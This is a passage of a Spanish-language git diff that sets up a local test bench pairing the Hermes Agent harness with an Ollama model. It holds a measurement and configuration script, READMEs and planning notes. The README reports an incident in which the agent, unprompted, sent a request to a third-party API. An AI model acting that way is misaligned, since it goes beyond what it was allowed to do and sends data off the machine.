intento: + + | Intento | `num_ctx` | Nota | + |---|---|---| + | 1 | 24576 | el objetivo | + | 2 | 20480 | | + | 3 | 16384 | **suelo**: por debajo no cabe el prompt fijo con holgura | + | 4 | 16384 con `num_gpu 24` | si ni asΓ­ | + + Si ninguno entra, se para y propone `OLLAMA_FLASH_ATTENTION=1` + + `OLLAMA_KV_CACHE_TYPE=q8_0` **sin aplicarlo**: es del servicio, no del modelo, + y afectarΓ­a tambiΓ©n al naranja. Esa decisiΓ³n es tuya. + +- **Configura Hermes con el nΓΊmero que saliΓ³.** En `~/.hermes/config.yaml`: + `model.default` (lΓ­nea 53) y `context_length` (lΓ­nea 113, ya estΓ‘ escrita y + comentada β€” la propia documentaciΓ³n del fichero dice que es justo para *"a + local server with a custom num_ctx"*). Copia de seguridad antes, y verificaciΓ³n + **parseando** despuΓ©s, nunca leyendo: + + ```bash + python3 -c "import yaml;print(yaml.safe_load(open('$HOME/.hermes/config.yaml'))['model'])" + ``` + + Dos trampas ya conocidas que el script evita: las **claves duplicadas** dentro + de `model:` (`provider` y `base_url` aparecen dos veces y en YAML gana la + ΓΊltima β€” por eso hoy casi sale el trΓ‘fico por OpenRouter), y que la lΓ­nea 122 + `# max_tokens: 8192` **estΓ‘ sin indentar**, asΓ­ que descomentarla tal cual la + dejarΓ­a fuera del bloque. + +- **La prueba decisiva**, antes de abrir nada: `curl` al endpoint con un `tools` + dentro. Separa dos preguntas que juntas se contestan mal β€” *ΒΏsabe el modelo + emitir una llamada?* y *ΒΏfunciona Hermes?*. Dictamen explΓ­cito: + `tool_calls` vΓ‘lido β†’ seguir; prosa o JSON roto β†’ parar y decidir modelo mayor + por CPU (hay 49 GB y 8 nΓΊcleos) o recortar herramientas. + +- **Resumen final** con lo medido y el comando siguiente. + +### 2. `verde/pruebas/` β€” la suite, con tu convenciΓ³n + +Misma forma que `pruebas/` del naranja: scripts numerados y un `ejecutar.sh` que +los pasa y resume. Ninguna abre el TUI. + +| | Comprueba | +|---|---| +| `01_gpu.sh` | tarjeta libre, sin naranja ni dataset compitiendo | +| `02_modelo.sh` | `4b-verde` existe con sus parΓ‘metros **y `4b-jarvis` sigue intacto** | +| `03_config.sh` | parseado: modelo, `context_length`, `base_url` en loopback, **cero URLs de nube** | +| `04_tool_calling.sh` | **la decisiva**: el modelo emite `tool_calls` bien formado | +| `05_cabe.sh` | `hermes prompt-size` < `context_length`, con margen | +| `06_privacidad.sh` | 0 credenciales, 0 tokens de mensajerΓ­a, nada fuera de loopback | +| `07_voz.sh` | `voz-verde.sh` genera WAV a 22050 Hz (hoy: 0,34 s para 3,2 s) | + +La 04 y la 05 son las que hoy no se pudieron pasar. La 06 replica el espΓ­ritu de +tu `pruebas/06_privacidad.sh`. + +### 3. `verde/ESCALERA.md` β€” lo que solo puedes juzgar tΓΊ + +El guion del primer arranque interactivo, con huecos para anotar tiempo y +resultado. De trivial a real, y **se para en el primer escalΓ³n que falle**, +que es el que informa: + +| # | Prueba | QuΓ© contesta | +|---|---|---| +| 1 | "hola, ΒΏquiΓ©n eres?" | el endpoint responde y el prompt cabe | +| 2 | "ΒΏcuΓ‘nto espacio libre queda?" | **una** herramienta, terminal | +| 3 | "lee verde/README.md y resΓΊmelo en una lΓ­nea" | herramienta de ficheros | +| 4 | "dime cuΓ‘l de los .md de verde/ es el mΓ‘s largo" | **varias vueltas encadenadas** | +| 5 | algo que dispare una skill | el paso 6 del vΓ­deo | +| 6 | que hable | debe sonar **igual que el naranja** | +| 7 | que escuche | **el ΓΊltimo**: 839 MiB de pico contra la tarjeta casi llena | + +El escalΓ³n 4 es el que separa un chatbot de un agente: encadenar llamadas y +razonar sobre el resultado de la anterior. + +El 7 puede dar `CUDA error: out of memory`, y **no serΓ­a un fallo nuevo**: es el +mismo reparto que documenta tu README. Salidas por orden: bajar a `base`, fiarse +de `unload_after_idle_seconds: 300`, o probar la escucha con el modelo +descargado. + +### 4. Notas al dΓ­a + +`verde/NOTAS.md` y `verde/README.md` ya recogen el bloqueo, la variante del +modelo y las trampas. Se actualizan para apuntar a `arrancar.sh` como la puerta +de entrada, y `NOTAS.md` recibe la tabla de VRAM por intento cuando se mida. + +## Lo que sigue sin hacerse + +- **No se toca `qwen3.5:4b-jarvis`**, ni `nucleo/`, `config/`, `voz/` o + `newelle/`. El naranja se cierra como proceso y se reabre igual. +- **No se mata `dataset.py`.** El script se planta si lo encuentra vivo. +- **No se ponen claves** ni se activa ningΓΊn canal de mensajerΓ­a. +- **No se cambia nada del servicio de ollama** sin decΓ­rtelo: `OLLAMA_KV_CACHE_TYPE` + se propone, no se aplica. + +## VerificaciΓ³n + +Con `dataset.py` ya terminado: + +```bash +./verde/arrancar.sh # mide, configura y dictamina +./verde/pruebas/ejecutar.sh # las 7, ninguna abre el TUI +./verde/verde-launcher.sh # el TUI en verde fosforo -> ESCALERA.md +``` + +Y devolver la mΓ‘quina a su sitio al acabar: `ollama stop qwen3.5:4b-verde`, y +comprobar que el naranja vuelve a arrancar con su VRAM de siempre. Sigue +pendiente, para cuando pares de desarrollar: + +```bash +cd pruebas && ./ejecutar.sh # las 104 del naranja +``` + +Hoy no se corrieron a propΓ³sito: abren la app y cargan el modelo. + +## Y antes de comparar los dos carriles + +El naranja tiene **121 acciones rΓ‘pidas que se saltan el modelo**; Hermes no +tiene ese atajo y toda orden le pasa por el cerebro. **El verde va a medir mΓ‘s +lento y no serΓ‘ culpa del modelo.** Para comparar hay que usar solo frases que +en el naranja tambiΓ©n acaben en el cerebro: estΓ‘n en +`config/jarvis-sin-accion.jsonl`. diff --git a/verde/README.md b/verde/README.md new file mode 100644 index 0000000..9b84a73 --- /dev/null +++ b/verde/README.md @@ -0,0 +1,129 @@ +# JARVIS verde + +Banco de pruebas con **Hermes Agent** debajo, para medir si un arnΓ©s agΓ©ntico +aporta algo sobre el nΓΊcleo. **100 % software libre**, y **local por +configuraciΓ³n pero no por construcciΓ³n** β€” ver el aviso de aquΓ­ abajo. + +> ⚠ **La frase "no sale nada de esta mΓ‘quina" era falsa y se ha corregido.** +> El 16 de agosto, pidiΓ©ndole un cartel en ASCII, el agente encontrΓ³ que +> `pyfiglet` no estaba instalado y **se fue a una API de terceros por su +> cuenta**. Nadie le dijo que podΓ­a. El cerebro, la voz, el oΓ­do y la memoria +> siguen siendo locales y comprobados; lo que no es local es **lo que el agente +> decida hacer con la terminal que le has dado**. EstΓ‘ contado entero en +> `NOTAS.md`. + +> **Estrenado el 16 de agosto de 2026.** Arranca, contesta y llama herramientas. +> Lo que costΓ³ llegar aquΓ­ fueron **dos topes encadenados**, los dos anotados en +> `NOTAS.md`: +> +> 1. El prompt fijo de Hermes son **~20.500 tokens** y `qwen3.5:4b-jarvis` va con +> `num_ctx 4096`. Por eso existe `qwen3.5:4b-verde`. +> 2. Y Hermes **rechaza de plano** cualquier modelo por debajo de **64.000** +> tokens de contexto. Eso invalidΓ³ la primera medida (24576, lo mΓ‘ximo que +> cabΓ­a en la tarjeta) y obligΓ³ a bajar media red a la CPU. +> +> El precio de esa segunda concesiΓ³n es el tiempo de respuesta. EstΓ‘ medido en +> `NOTAS.md` y es **el dato que decide si este carril vale la pena**. + +Los tres se distinguen por color: **cian** el de Newelle (congelado), **naranja** +el nΓΊcleo (en desarrollo), **verde** este. + +## De dΓ³nde sale esto + +De un reel de 75 s que vende *"construye tu Jarvis en un fin de semana"* en +nueve pasos. Siete de los nueve ya estaban hechos aquΓ­, y mejor. Los tres que +no: **skills que el agente se crea solo, canales de mensajerΓ­a y memoria**. Eso +es lo que este carril viene a probar. + +## El stack + +| Capa | Pieza | Licencia | ΒΏSale algo? | +|---|---|---|---| +| ArnΓ©s | Hermes Agent | MIT | no | +| Cerebro | Ollama Β· `qwen3.5:4b-verde` | Apache 2.0 | **no** β€” `127.0.0.1:11434` | +| OΓ­r | faster-whisper local | MIT | **no** | +| Hablar | Piper 1.2.0, vΓ­a `jarvis-piper.sh` | MIT | **no** | +| Memoria de conversaciΓ³n | SQLite FTS5 de Hermes | MIT | **no** | +| Memoria de conocimiento | `boveda/`, ficheros Markdown | β€” | **no** | +| Navegador | Playwright + Chromium | Apache 2.0 / BSD-3 | solo si navega | + +**Cero claves, cero cuentas, cero euros.** Descartados por eso: ElevenLabs, +Honcho, Groq, Firecrawl, Nous Portal. Y **Edge TTS**, que es gratis pero es un +servicio de Microsoft y era la ΓΊnica pieza no libre del carril. + +## QuΓ© hay aquΓ­ + +``` +verde/ +β”œβ”€β”€ arrancar.sh LA PUERTA DE ENTRADA: mide, configura y dictamina +β”œβ”€β”€ pruebas/ las 7 comprobaciones; ninguna abre el TUI +β”œβ”€β”€ ESCALERA.md el guion del primer arranque a mano, con huecos que rellenar +β”œβ”€β”€ PLAN-ARRANQUE.md el plan del que saliΓ³ todo esto +β”œβ”€β”€ instalar.sh baja el instalador oficial, lo enseΓ±a y lo corre sin arrancar nada +β”œβ”€β”€ install-oficial.sh el instalador tal cual, para poder auditarlo y diffearlo +β”œβ”€β”€ instalacion.log lo que hizo +β”œβ”€β”€ config.yaml la configuraciΓ³n β†’ se copia a ~/.hermes/config.yaml +β”œβ”€β”€ env.ejemplo plantilla del .env, sin una sola clave +β”œβ”€β”€ voz-verde.sh adaptador para que hable con la voz del naranja +β”œβ”€β”€ verde-launcher.sh arranca el TUI en verde fΓ³sforo +β”œβ”€β”€ jarvis-verde.svg el icono +β”œβ”€β”€ boveda/ memoria de conocimiento β€” vacΓ­a a propΓ³sito +└── NOTAS.md lo medido y lo que queda abierto +``` + +Se entra siempre por el mismo sitio: + +```bash +./arrancar.sh # deja el carril listo, y se planta si algo no cuadra +./pruebas/ejecutar.sh # 46 comprobaciones, ninguna abre el TUI +./verde-launcher.sh # el TUI β†’ y se sigue ESCALERA.md +``` + +El cΓ³digo de Hermes vive en `~/.hermes/`, igual que el HUD de Newelle vive en +`~/.var/app/…`. AquΓ­ solo estΓ‘ lo que se edita a mano. + +## Uso + +```bash +./verde-launcher.sh --status # quΓ© hay y cuΓ‘nta VRAM, sin arrancar nada +./verde-launcher.sh # el TUI, en verde fΓ³sforo +./verde-launcher.sh --stop # cerrar +``` + +`--status` es el que se puede correr hoy: no toca la grΓ‘fica. + +## La voz: por quΓ© suena igual que el naranja + +Hermes trae un proveedor de TTS **por comando** que no estΓ‘ en su web pero sΓ­ en +su cΓ³digo (`tools/tts_tool.py`). Eso permite llamar al mismo +`config/jarvis-piper.sh` del naranja, con su binario Piper MIT, su `.onnx` y su +cadena de audio. + +No es un detalle estΓ©tico: si el verde hablara con una voz que Piper se descarga +por su cuenta, comparar la voz de los dos carriles no dirΓ­a nada. Detalles y +trampas en `NOTAS.md` y en la cabecera de `voz-verde.sh`. + +## El aviso que hay que leer antes de comparar + +El naranja tiene **150 acciones rΓ‘pidas que se saltan el modelo**. Hermes no +tiene ese atajo: allΓ­ toda orden pasa por el cerebro. + +**El verde va a medir mΓ‘s lento, y no serΓ‘ culpa del modelo.** Para comparar de +verdad hay que usar solo frases que en el naranja tambiΓ©n acaben en el cerebro. +EstΓ‘ desarrollado en `NOTAS.md`. + +## Lo comprobado el primer dΓ­a, y lo que falta + +**Llama herramientas bien.** Era la duda que abrΓ­a este carril β€”la guΓ­a de +Hermes marca *sin* tool calling todo lo de 9B para abajoβ€” y saliΓ³ a favor: pide +la herramienta cuando toca, acierta los argumentos, y **no** la llama cuando la +pregunta no la necesita. + +**Es flojo con las rutas relativas.** Se le pidiΓ³ `verde/README.md` y leyΓ³ el +`README.md` de la raΓ­z. El detalle estΓ‘ en `NOTAS.md`, con la observaciΓ³n que +mΓ‘s pesa: cuando una herramienta le devuelve un **error**, se recupera y busca +otro camino; cuando le devuelve **un fichero que existe pero no es el pedido**, +no tiene forma de notarlo. + +Falta lo que solo se juzga a mano: los escalones 5 (una skill), 6 (la voz dentro +de Hermes) y 7 (la escucha por micrΓ³fono) de `ESCALERA.md`. diff --git a/verde/arrancar.sh b/verde/arrancar.sh new file mode 100755 index 0000000..5a5e460 --- /dev/null +++ b/verde/arrancar.sh @@ -0,0 +1,304 @@ +#!/usr/bin/env bash +# Deja el carril verde listo para usar: mide, configura y dictamina. +# +# ./arrancar.sh medir, configurar y dictaminar +# ./arrancar.sh --solo-medir medir sin tocar la configuracion +# ./arrancar.sh --igual no plantarse aunque dataset.py siga vivo +# +# ── Por que existe ───────────────────────────────────────────────────────── +# +# El primer arranque del verde topo con algo que no se anticipaba: el prompt +# fijo de Hermes son ~20.500 tokens (26 KB de sistema + 56 KB de esquemas de 19 +# herramientas) y qwen3.5:4b-jarvis va con num_ctx 4096. Cinco veces por encima. +# No es que rinda mal: no entra la pregunta. +# +# Para eso existe qwen3.5:4b-verde. Pero cuanto contexto cabe en una GPU de +# 4 GB no se puede calcular sobre el papel β€”ollama no reporta head_count_kvβ€”, +# hay que medirlo. Este script lo mide, escribe el resultado donde toca y +# contesta la unica pregunta que de verdad decide si esto va a funcionar. +# +# ── El suelo de 64k, que manda sobre todo lo anterior (16 ago) ────────────── +# +# La primera version de este script buscaba el mayor num_ctx que cupiera en la +# tarjeta y encontro 24576, con 32 capas en GPU y 3301 MiB. Todo correcto y +# todo inutil: al abrir Hermes salta +# +# Model qwen3.5:4b-verde has a context window of 24,576 tokens, which is +# below the minimum 64,000 required by Hermes Agent. +# +# Es un tope DURO del arnes, no un aviso: agent/model_metadata.py:405, +# MINIMUM_CONTEXT_LENGTH = 64_000, comprobado en agent/agent_init.py:2656. +# +# Hay una puerta de atras en ese mismo if β€”si provider es "lmstudio" y +# context_length esta puesto a mano, se salta el sueloβ€” y NO se usa: el +# proveedor lmstudio llama a /api/v1/models, que es la API nativa de LM Studio +# y ollama no tiene, ademas de intentar precargar el modelo por su cuenta. +# Fingir ser otro servidor romperia mas adelante y de forma mas confusa. +# +# Tampoco se miente en el config.yaml poniendo 64000 con el modelo a 24576: el +# arnes creeria tener 64k, no comprimiria hasta acercarse, y ollama iria tirando +# los tokens mas viejos β€”que son el prompt de sistema y los esquemas de las +# herramientasβ€”. El sintoma seria que el agente deja de llamar herramientas a +# mitad de sesion, sin un solo error en el log. +# +# Asi que el numero a buscar ya no es el contexto: es CUANTAS CAPAS caben en la +# tarjeta con num_ctx 65536 fijo. Medido el 16 ago: +# +# num_gpu 32 -> cudaMalloc failed num_gpu 16 -> 2795 MiB, CARGA +# num_gpu 24 -> cudaMalloc failed num_gpu 8 -> 1772 MiB, CARGA +# num_gpu 0 -> 0 MiB, todo en RAM +# +# ── Se planta en vez de seguir ───────────────────────────────────────────── +# +# Cada paso comprueba lo suyo y aborta si no cuadra. Es a proposito: un fallo +# aqui es de una linea, y el mismo fallo tres pasos mas adelante sale como +# "respuestas raras" y cuesta una tarde. +set -uo pipefail + +AQUI=$(cd -P "$(dirname "${BASH_SOURCE[0]:-$0}")" && pwd) +RAIZ=$(cd -P "$AQUI/.." && pwd) +CONFIG=$HOME/.hermes/config.yaml +OLLAMA=${OLLAMA_URL:-http://127.0.0.1:11434} +MODELO=qwen3.5:4b-verde +NARANJA=qwen3.5:4b-jarvis + +# El suelo duro de Hermes es 64.000 (agent/model_metadata.py:405). Se pide la +# potencia de dos justo por encima, que es lo que entiende ollama sin discutir. +CTX_MINIMO=65536 + +SOLO_MEDIR=no +IGUAL=no +for a in "$@"; do + case "$a" in + --solo-medir) SOLO_MEDIR=si ;; + --igual) IGUAL=si ;; + -h|--help) sed -n '2,10p' "$0"; exit 0 ;; + esac +done + +rojo() { printf '\033[31m%s\033[0m\n' "$*"; } +verde() { printf '\033[32m%s\033[0m\n' "$*"; } +gris() { printf '\033[90m%s\033[0m\n' "$*"; } +titulo(){ printf '\n\033[1m── %s ─────────────────────────────────────\033[0m\n' "$*"; } +abortar(){ rojo " βœ— $*"; exit 1; } + +vram() { nvidia-smi --query-gpu=memory.used --format=csv,noheader 2>/dev/null | tr -d ' MiB'; } + +# ═══ 1. La tarjeta ═════════════════════════════════════════════════════════ +titulo "1. Liberar la tarjeta" + +if pgrep -f 'entrena/dataset.py' >/dev/null 2>&1; then + if [ "$IGUAL" = no ]; then + rojo " βœ— dataset.py sigue corriendo." + gris " Es un trabajo de 7-10 h que usa $NARANJA en la grafica." + gris " Competir con el por la VRAM estropea las dos cosas: el verde" + gris " no cargara y el dataset ira mas lento." + gris "" + gris " Por donde va:" + [ -f "$RAIZ/entrena/dataset.log" ] && sed 's/^/ /' "$RAIZ/entrena/dataset.log" | tail -3 + gris "" + gris " Espera a que acabe, o --igual para seguir de todas formas." + exit 1 + fi + rojo " ! dataset.py corriendo y --igual puesto: siguiendo bajo tu responsabilidad" +fi + +# Restos del naranja. Se para el proceso; NO se toca ni un fichero suyo. +for p in 'nucleo/jarvis.py' 'whisper-server'; do + if pgrep -f "$p" >/dev/null 2>&1; then + gris " cerrando $p" + pkill -f "$p" 2>/dev/null + fi +done +ollama stop "$NARANJA" >/dev/null 2>&1 +sleep 3 + +LIBRE=$(vram) +if [ -z "$LIBRE" ]; then + abortar "no hay nvidia-smi: esto necesita la grafica" +elif [ "$LIBRE" -gt 400 ]; then + rojo " ! la tarjeta sigue con $LIBRE MiB usados" + nvidia-smi --query-compute-apps=pid,used_memory,name --format=csv,noheader | sed 's/^/ /' + gris " Algo la esta usando. Mira la lista de arriba antes de seguir." + [ "$IGUAL" = no ] && exit 1 +else + verde " βœ“ tarjeta libre: $LIBRE MiB" +fi + +# ═══ 2. Cuantas capas caben con el contexto que Hermes exige ═══════════════ +titulo "2. Cuantas capas caben a 65536 (medido, no supuesto)" + +gris " El contexto NO se negocia: Hermes rechaza cualquier modelo por debajo de" +gris " 64.000 tokens. Lo que se busca es el mayor num_gpu que cargue a 65536:" +gris " cada capa que baja a la CPU cuesta velocidad, asi que se cogen todas las" +gris " que quepan." + +TMP=$(mktemp --suffix=.Modelfile); trap 'rm -f "$TMP"' EXIT +GANADOR=""; GANADOR_VRAM="" + +probar_ctx() { # $1 = num_ctx $2 = num_gpu + printf 'FROM qwen3.5:4b\nPARAMETER num_gpu %s\nPARAMETER num_ctx %s\nPARAMETER num_predict 4096\nPARAMETER temperature 0.2\n' "$2" "$1" > "$TMP" + ollama create "$MODELO" -f "$TMP" >/dev/null 2>&1 || return 1 + local r + r=$(curl -s --max-time 240 "$OLLAMA/v1/chat/completions" -H 'Content-Type: application/json' \ + -d "{\"model\":\"$MODELO\",\"messages\":[{\"role\":\"user\",\"content\":\"ok\"}],\"max_tokens\":5}" 2>/dev/null) + echo "$r" | grep -q '"choices"' || return 1 + return 0 +} + +for GPU in 32 24 16 8 0; do + printf ' num_ctx %-6s num_gpu %-3s ... ' "$CTX_MINIMO" "$GPU" + if probar_ctx "$CTX_MINIMO" "$GPU"; then + V=$(curl -fsS --max-time 5 "$OLLAMA/api/ps" 2>/dev/null | python3 -c " +import json,sys +m=json.load(sys.stdin)['models'] +print(m[0]['size_vram']//1048576 if m else 0)" 2>/dev/null) + verde "CABE (en tarjeta $V MiB, tarjeta $(vram) MiB)" + GANADOR=$CTX_MINIMO; GANADOR_GPU=$GPU; GANADOR_VRAM=$V + break + fi + rojo "no cabe" + ollama stop "$MODELO" >/dev/null 2>&1; sleep 2 +done + +if [ -z "$GANADOR" ]; then + rojo " βœ— no carga a 65536 ni con TODAS las capas en la CPU." + gris " Eso ya no es la grafica: mira la RAM libre con free -h." + exit 1 +fi + +verde " βœ“ num_ctx $GANADOR con $GANADOR_GPU de 32 capas en GPU, $GANADOR_VRAM MiB" + +if [ "$GANADOR_GPU" -lt 32 ]; then + gris "" + gris " $(( 32 - GANADOR_GPU )) capas van por CPU y eso se paga en el prefill: el prompt fijo" + gris " son ~20.500 tokens que hay que procesar en CADA vuelta del agente." + gris "" + gris " Palanca para recuperar capas, y NO la aplico yo porque es del SERVICIO" + gris " de ollama, no del modelo: afectaria tambien al naranja la proxima vez" + gris " que arranque. Esa decision es tuya." + gris "" + gris " sudo systemctl edit ollama" + gris " [Service]" + gris " Environment=\"OLLAMA_FLASH_ATTENTION=1\"" + gris " Environment=\"OLLAMA_KV_CACHE_TYPE=q8_0\"" + gris " sudo systemctl restart ollama" + gris "" + gris " Parte el KV cache por la mitad. Si lo haces, anotalo en NOTAS.md y en" + gris " config/qwen3.5-4b-jarvis.Modelfile, o en tres semanas nadie sabra de" + gris " donde salio el cambio." +fi + +HUECO=$(( GANADOR - 20500 )) +gris " quedan ~$HUECO tokens de conversacion tras el prompt fijo" + +# ═══ 3. Configurar Hermes ══════════════════════════════════════════════════ +titulo "3. Decirle a Hermes la verdad" + +if [ "$SOLO_MEDIR" = si ]; then + gris " --solo-medir: no toco $CONFIG" + gris " Para aplicarlo a mano: model.default=$MODELO y context_length=$GANADOR" +else + cp "$CONFIG" "$CONFIG.antes-de-arrancar" 2>/dev/null + python3 - "$CONFIG" "$MODELO" "$GANADOR" <<'PY' +import re, sys +ruta, modelo, ctx = sys.argv[1], sys.argv[2], int(sys.argv[3]) +lineas = open(ruta).read().splitlines(True) + +# Se edita por LINEAS, no reescribiendo el YAML: el fichero son 1890 lineas de +# documentacion propia y volcarlo con yaml.dump la perderia entera. +hecho_modelo = hecho_ctx = False +for i, l in enumerate(lineas): + if not hecho_modelo and re.match(r'^ default: ', l): + lineas[i] = f' default: "{modelo}"\n'; hecho_modelo = True + # context_length viene comentada de fabrica dentro del bloque model:. + # La propia plantilla dice que es justo para "a local server with a custom + # num_ctx", que es exactamente este caso. + elif not hecho_ctx and re.match(r'^ # context_length: ', l): + lineas[i] = (f' # JARVIS verde: el num_ctx REAL del Modelfile. Sin esto Hermes\n' + f' # se cree lo que dice /api/show, que son 262144 (el maximo del\n' + f' # modelo) y no lo configurado.\n' + f' context_length: {ctx}\n') + hecho_ctx = True + +if not hecho_modelo: sys.exit("no encontre la linea 'default:' en el bloque model") +if not hecho_ctx: sys.exit("no encontre la linea '# context_length:' comentada") +open(ruta, 'w').writelines(lineas) +PY + [ $? -ne 0 ] && abortar "no pude escribir la configuracion (copia en $CONFIG.antes-de-arrancar)" + + # Verificar PARSEANDO, nunca leyendo: este fichero declara provider y + # base_url DOS veces dentro de model: y en YAML gana la ultima. Leyendolo + # parecia configurado y el trafico salia por OpenRouter. + python3 - "$CONFIG" "$MODELO" "$GANADOR" <<'PY' +import sys, yaml +ruta, modelo, ctx = sys.argv[1], sys.argv[2], int(sys.argv[3]) +m = yaml.safe_load(open(ruta))['model'] +fallos = [] +if m.get('default') != modelo: fallos.append(f"default={m.get('default')}") +if m.get('context_length') != ctx: fallos.append(f"context_length={m.get('context_length')}") +if '127.0.0.1' not in str(m.get('base_url','')): fallos.append(f"base_url={m.get('base_url')}") +if fallos: sys.exit("la configuracion NO quedo como se pedia: " + ", ".join(fallos)) +print(f" modelo={m['default']} context_length={m['context_length']} base_url={m['base_url']}") +PY + [ $? -ne 0 ] && abortar "verificacion fallida; restaura con: cp $CONFIG.antes-de-arrancar $CONFIG" + verde " βœ“ configurado y verificado parseando" +fi + +# ═══ 4. La prueba decisiva ═════════════════════════════════════════════════ +titulo "4. ΒΏSabe el modelo llamar herramientas?" + +gris " Esto va ANTES de abrir el TUI a proposito. Separa dos preguntas que" +gris " juntas se contestan mal: ΒΏsabe el modelo emitir una llamada? y" +gris " ΒΏfunciona Hermes? Si falla aqui, no hay nada que depurar en Hermes." + +R=$(curl -s --max-time 300 "$OLLAMA/v1/chat/completions" -H 'Content-Type: application/json' -d "{ + \"model\": \"$MODELO\", + \"messages\": [{\"role\":\"user\",\"content\":\"ΒΏCuΓ‘nto espacio libre queda en el disco?\"}], + \"tools\": [{\"type\":\"function\",\"function\":{ + \"name\":\"ejecuta_comando\", + \"description\":\"Ejecuta un comando de shell y devuelve su salida\", + \"parameters\":{\"type\":\"object\",\"properties\":{\"comando\":{\"type\":\"string\"}},\"required\":[\"comando\"]}}}] +}" 2>/dev/null) + +echo "$R" | python3 -c " +import json, sys +try: d = json.load(sys.stdin) +except Exception: print(' RESPUESTA ILEGIBLE'); sys.exit(2) +if 'error' in d: print(' ERROR:', str(d['error'])[:200]); sys.exit(2) +msg = d['choices'][0]['message'] +tc = msg.get('tool_calls') or [] +if not tc: + print(' SIN tool_calls. Contesto en prosa:') + print(' ', repr((msg.get('content') or '')[:200])) + sys.exit(1) +f = tc[0]['function'] +print(' herramienta :', f['name']) +print(' argumentos :', f['arguments']) +try: + json.loads(f['arguments']); print(' JSON valido') +except Exception: print(' JSON ROTO'); sys.exit(1) +sys.exit(0) +" +VEREDICTO=$? + +titulo "Resumen" +printf ' contexto %s tokens (%s capas en GPU, %s MiB)\n' "$GANADOR" "$GANADOR_GPU" "$GANADOR_VRAM" +printf ' prompt fijo ~20.500 tokens -> quedan ~%s de conversacion\n' "$HUECO" + +if [ "$VEREDICTO" -eq 0 ]; then + verde " βœ“ el modelo llama herramientas. Lo que falle a partir de aqui es de Hermes." + gris "" + gris " Siguiente:" + gris " $AQUI/pruebas/ejecutar.sh las comprobaciones, ninguna abre el TUI" + gris " $AQUI/verde-launcher.sh el TUI en verde -> sigue ESCALERA.md" +else + rojo " βœ— el modelo NO emite llamadas usables en este formato." + gris "" + gris " Abrir el TUI ahora solo daria un fallo mas confuso. Dos salidas:" + gris " Β· modelo mayor por CPU: hay 49 GB de RAM y 8 nucleos fisicos." + gris " qwen3.5:9b esta en disco. Lento pero es un banco de pruebas." + gris " Β· recortar herramientas en platform_toolsets del config.yaml:" + gris " cli: [hermes-cli] -> una lista corta. Menos esquema, menos lio." + exit 1 +fi diff --git a/verde/boveda/README.md b/verde/boveda/README.md new file mode 100644 index 0000000..1bf65c3 --- /dev/null +++ b/verde/boveda/README.md @@ -0,0 +1,72 @@ +# La bΓ³veda + +Ficheros Markdown con lo que JARVIS tiene que saber de ti y de tu trabajo. Es +el **paso 4 del vΓ­deo** β€”*teach it who you are*β€” y, aquΓ­, tambiΓ©n el sustituto +del paso 5. + +**EstΓ‘ vacΓ­a a propΓ³sito.** Llenarla es decidir quΓ© sabe JARVIS de ti, y eso no +lo hace un script por su cuenta. + +## Por quΓ© una carpeta y no Honcho + +El vΓ­deo vende Honcho (lo rotula "Hancho AI"). Honcho es AGPL-3.0 y se +autoaloja, pero su razonamiento exige clave de Gemini, Anthropic u OpenAI: te +darΓ­a el cΓ³digo libre y te seguirΓ­a sacando las conversaciones de la mΓ‘quina. + +Una bΓ³veda es una **carpeta de ficheros Markdown**. Nada mΓ‘s. Y eso resulta ser +casi todo lo que hace falta: + +- El agente la lee sin intermediarios, porque son ficheros. +- Se versiona con git, se busca con `grep`, se edita con cualquier cosa. +- No caduca, no cambia de precio y no cierra. + +Obsidian y Logseq son **visores** por encima de estos mismos ficheros, no un +formato distinto. Si quieres uno: **Logseq es AGPL-3.0** y libre incluso para +uso comercial; Obsidian es propietario (gratis personal, 50 $/usuario/aΓ±o si lo +usas para trabajar). Los dos leen esta carpeta tal cual. Ninguno hace falta. + +## Lo que una bΓ³veda NO hace + +Conviene tenerlo claro antes de montarlo y no despuΓ©s de esperar otra cosa. + +| | BΓ³veda + RAG | Honcho | +|---|---|---| +| Recuperar lo que escribiste | SΓ­ | SΓ­ | +| Inferir cΓ³mo eres, sin que lo escribas | **No** | SΓ­ | + +Una bΓ³veda da **recuerdo**. Honcho vende **perfilado**: pasadas de razonamiento +sobre tus conversaciones para construir un modelo de ti. Si lo que quieres es +guardar contextos, esto sobra y gana. Si querΓ­as el modelo psicolΓ³gico, una +carpeta no lo hace. + +## CΓ³mo llenarla + +Un fichero por tema, nombre en minΓΊsculas y sin acentos. Sugerencia de arranque: + +``` +quien-soy.md quiΓ©n eres, a quΓ© te dedicas, cΓ³mo trabajas +la-maquina.md hardware, sistema, lo que hay instalado y dΓ³nde +proyectos.md en quΓ© andas, con quΓ© prioridad +como-hablarme.md tono, idioma, quΓ© odias que haga un asistente +``` + +Texto plano y frases cortas. Lo que un compaΓ±ero nuevo necesitarΓ­a saber el +primer dΓ­a, no una autobiografΓ­a. + +## Si esto crece + +Ya tienes la maquinaria de Γ­ndice escrita en este mismo repo, y no hace falta +instalar nada mΓ‘s: + +| Pieza | QuΓ© hace | +|---|---| +| `config/indexar.py` | filtra COFRE: 76,6 MB de texto β†’ 20,8 MB de conocimiento | +| `config/construir_indice.py` | construye el Γ­ndice, ~20 000 fragmentos | +| `config/probar_rag.py` | lo consulta | +| `model2vec` | los embeddings, locales | + +Para unos pocos ficheros no hace falta: Hermes los lee enteros como ficheros de +contexto y sale mΓ‘s barato que montar un Γ­ndice. El Γ­ndice empieza a compensar +cuando la bΓ³veda no cabe en el contexto del modelo β€” con `qwen3.5:4b` eso pasa +antes de lo que parece, asΓ­ que conviene mirarlo cuando esto pase de unas +decenas de ficheros. diff --git a/verde/config.yaml b/verde/config.yaml new file mode 100644 index 0000000..9c11914 --- /dev/null +++ b/verde/config.yaml @@ -0,0 +1,134 @@ +# JARVIS verde β€” lo que se cambio en la configuracion de Hermes Agent. +# +# ── OJO: esto NO se copia encima de ~/.hermes/config.yaml ────────────────── +# +# El instalador genera alli un fichero de 1890 lineas (121 activas) con toda +# su documentacion dentro. Machacarlo con estas 30 lineas funcionaria β€”lo que +# falte cae a los valores de hermes_cli/config_defaults.pyβ€” pero se perderia +# esa documentacion y el siguiente `hermes update` no tendria con que comparar. +# +# Asi que alli se editaron SOLO los bloques de abajo, en su sitio, y este +# fichero es el registro de que se toco y por que. La copia intacta del +# instalador quedo en ~/.hermes/config.yaml.recien-instalado. +# +# ── Y una trampa que casi cuela ──────────────────────────────────────────── +# +# Ese config.yaml declara `provider` y `base_url` DOS VECES dentro de `model:`. +# En YAML gana la ultima. Poner Ollama en la primera dejaba el fichero con +# buena pinta y el trafico saliendo por OpenRouter. Hay que PARSEARLO, no +# leerlo: +# +# python3 -c "import 